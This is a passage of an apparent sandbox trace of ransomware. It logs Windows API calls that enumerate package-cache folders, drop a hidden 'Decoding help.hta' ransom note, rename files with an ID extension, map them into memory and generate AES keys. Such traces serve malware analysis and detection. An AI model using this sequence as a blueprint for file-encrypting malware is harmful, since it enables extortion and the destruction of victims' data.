Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0056.938] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0056.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x59c [0058.474] CreateFileMappingA (hFile=0x59c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x478 [0058.474] CryptAcquireContextA (in: phProv=0x21ecfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x21ecfcec*=0x2aac67f8) returned 1 [0060.222] CryptGenKey (in: hProv=0x2aac67f8, Algid=0x6610, dwFlags=0x1, phKey=0x21ecfce8 | out: phKey=0x21ecfce8*=0x6717f0) returned 1 [0060.222] CryptExportKey (in: hKey=0x6717f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21ecfbe4, pdwDataLen=0x21ecfce4 | out: pbData=0x21ecfbe4*, pdwDataLen=0x21ecfce4*=0x2c) returned 1 [0060.222] MapViewOfFile (hFileMappingObject=0x478, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x14960000 Thread: id = 788 os_tid = 0xa40 [0054.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2214fd30 | out: lpFindFileData=0x2214fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6713b0 [0055.678] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.678] FindNextFileW (in: hFindFile=0x6713b0, lpFindFileData=0x2214fd30 | out: lpFindFileData=0x2214fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.679] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.679] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.679] FindNextFileW (in: hFindFile=0x6713b0, lpFindFileData=0x2214fd30 | out: lpFindFileData=0x2214fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0055.826] lstrcpyW (in: lpString1=0x2aa10db8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0055.826] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned 124 [0055.827] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0055.827] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0xffffffff [0055.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0060.899] WriteFile (in: hFile=0x31c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2214fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2214fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.899] CloseHandle (hObject=0x31c) returned 1 [0060.900] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.900] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0060.900] lstrlenW (lpString="cab1.cab") returned 8 [0060.900] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0060.900] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned 124 [0060.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0060.900] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0060.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0060.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.900] FindNextFileW (in: hFindFile=0x6713b0, lpFindFileData=0x2214fd30 | out: lpFindFileData=0x2214fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeab3900, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfeab3900, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfeab3900, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0060.900] lstrcpyW (in: lpString1=0x2aa10db8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0060.900] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned 124 [0060.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0060.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0x1 [0060.900] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeAdditional_x86.msi") returned -1 [0060.901] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0060.901] lstrcmpiW (lpString1="[ID]", lpString2=".msi") returned 1 [0060.901] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0060.901] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned 124 [0060.901] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0060.901] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0060.901] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0060.901] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0060.902] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7a8 [0060.902] CryptAcquireContextA (phProv=0x2214fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 789 os_tid = 0x9fc [0054.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x2a2d75f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db238 [0056.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.945] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x2a2d75f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.945] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.945] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.945] FindNextFileW (in: hFindFile=0x5db238, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x165257, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.945] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0056.945] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 123 [0056.946] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0056.946] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0x20 [0056.946] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0056.946] lstrlenW (lpString="cab1.cab") returned 8 [0056.946] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0056.946] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 123 [0056.946] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0056.946] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0056.946] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0056.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610 [0058.483] CreateFileMappingA (hFile=0x610, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x728 [0058.483] CryptAcquireContextA (in: phProv=0xe88fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe88fcec*=0x2aac6908) returned 1 [0060.224] CryptGenKey (in: hProv=0x2aac6908, Algid=0x6610, dwFlags=0x1, phKey=0xe88fce8 | out: phKey=0xe88fce8*=0x5e2770) returned 1 [0060.224] CryptExportKey (in: hKey=0x5e2770, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe88fbe4, pdwDataLen=0xe88fce4 | out: pbData=0xe88fbe4*, pdwDataLen=0xe88fce4*=0x2c) returned 1 [0060.224] MapViewOfFile 